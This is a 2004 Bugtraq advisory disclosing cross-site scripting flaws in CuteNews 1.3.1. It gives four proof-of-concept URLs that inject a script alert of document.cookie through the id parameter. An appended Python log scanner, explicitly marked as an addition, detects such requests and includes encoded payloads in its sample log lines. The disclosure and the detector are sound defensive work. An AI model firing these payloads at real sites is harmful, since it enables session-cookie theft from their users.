Bugtraq: Cross-Site Scripting CuteNews

Cross-Site Scripting CuteNews

From: DarkBicho <darkbicho_at_fastmail.fm>
Date: Sun, 27 Jun 2004 17:37:12 -0700

http://www.swp-zone.org/archivos/advisory-06.txt

-------------------------------------------------------------------------------------------------

                            :.: Cross-Site Scripting CuteNews :.:

  PROGRAM: CuteNews
  HOMEPAGE: http://cutephp.com/
  VERSION: v1.3.1
  BUG: Cross-Site Scripting
  DATE: 23/05/2004
  AUTHOR: DarkBicho
          web: http://www.darkbicho.tk
          team: Security Wari Proyects <www.swp-zone.org>
          Email: darkbicho_at_peru.com

-------------------------------------------------------------------------------------------------

1.- Affected software description:
    -----------------------------

    CuteNews is a popular news publishing system, written in PHP by
    CutePHP.

2.- Vulnerabilities:
    ---------------

    A. Cross-Site Scripting aka XSS:

    :.: In Id :
 http://attacker/show_archives.php?subaction=showcomments&id=<script>alert(document.cookie);</script>&archive=&start_from=&ucat=&&archive=&start_from=&ucat=&

http://attacker/show_news.php?subaction=showcomments&id=<script>alert(document.cookie);</script>&archive=&start_from=&ucat=&

http://attacker/example1.php?subaction=showfull&id=<script>alert(document.cookie);</script>

http://attacker/example2.php?subaction=showfull&id=<script>alert(document.cookie);</script>

    
   
3.- SOLUTION:
    --------
    Vendors were contacted many weeks ago and plan to release a fixed
    version soon.
    Check the CuteNews website for updates and official release details.

4.- Greetings:
    ---------

    greetings to my Peruvian group swp and perunderforce :D
    "PISCO IS AND WILL BE PERUVIAN"

5.- Contact
    -------

        WEB: http://www.darkbicho.tk
        EMAIL: darkbicho_at_peru.com

-------------------------------------------------------------------------------------------------
                                Security Wari Projects
                                  (c) 2002 - 2004
                                    Made in Peru

----------------------------------------[ EOF ]----------------------------------------------
 
  
  
DarkBicho
Web: http://www.darkbicho.tk
"My only crime is seeing what others cannot see"

---------------------- The End ----------------------
Received on Jun 28 2004
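
Added example, not part of the original advisory: a log check a site operator could run while waiting for the fixed release, flagging requests to the four scripts named above whose id parameter is not a plain number, including percent-encoded and double-encoded values. The log lines are constructed samples, and the rule that legitimate ids are purely numeric is an assumption about CuteNews.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script names taken from the URLs in the advisory.
AFFECTED = {"show_archives.php", "show_news.php", "example1.php", "example2.php"}
# Assumption: a legitimate CuteNews id consists of digits only.
NUMERIC_ID = re.compile(r"[0-9]+\Z")
# Request target inside a common/combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_ids(url):
    """Return the decoded id values in `url` that are not plain numbers."""
    try:
        parts = urlsplit(url)
    except ValueError:          # malformed target, nothing to parse
        return []
    if parts.path.rsplit("/", 1)[-1].lower() not in AFFECTED:
        return []
    bad = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() != "id" or not value:
            continue            # other parameter, or an empty id
        # parse_qsl decoded once; decode again to expose double encoding.
        decoded = unquote(value)
        if not NUMERIC_ID.match(decoded):
            bad.append(decoded)
    return bad

def scan_log(lines):
    """Return (line_number, decoded_id) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            hits.extend((number, v) for v in suspicious_ids(match.group(1)))
    return hits

# Constructed sample log lines (documentation-range addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Jun/2004:09:14:02 +0000] "GET /news/show_news.php?subaction=showcomments&id=1087300000&archive=&start_from=&ucat= HTTP/1.1" 200 5120',
    '198.51.100.7 - - [28/Jun/2004:09:15:40 +0000] "GET /news/show_news.php?subaction=showcomments&id=%3Cscript%3Ealert(document.cookie);%3C/script%3E&archive=&start_from=&ucat=& HTTP/1.1" 200 4871',
    '198.51.100.7 - - [28/Jun/2004:09:16:05 +0000] "GET /news/example1.php?subaction=showfull&id=%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1" 200 4410',
    '192.0.2.33 - - [28/Jun/2004:09:17:11 +0000] "GET /index.php?id=%3Cb%3E HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for number, value in scan_log(SAMPLE_LOG):
        print(f"line {number}: non-numeric id {value!r}")
```
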
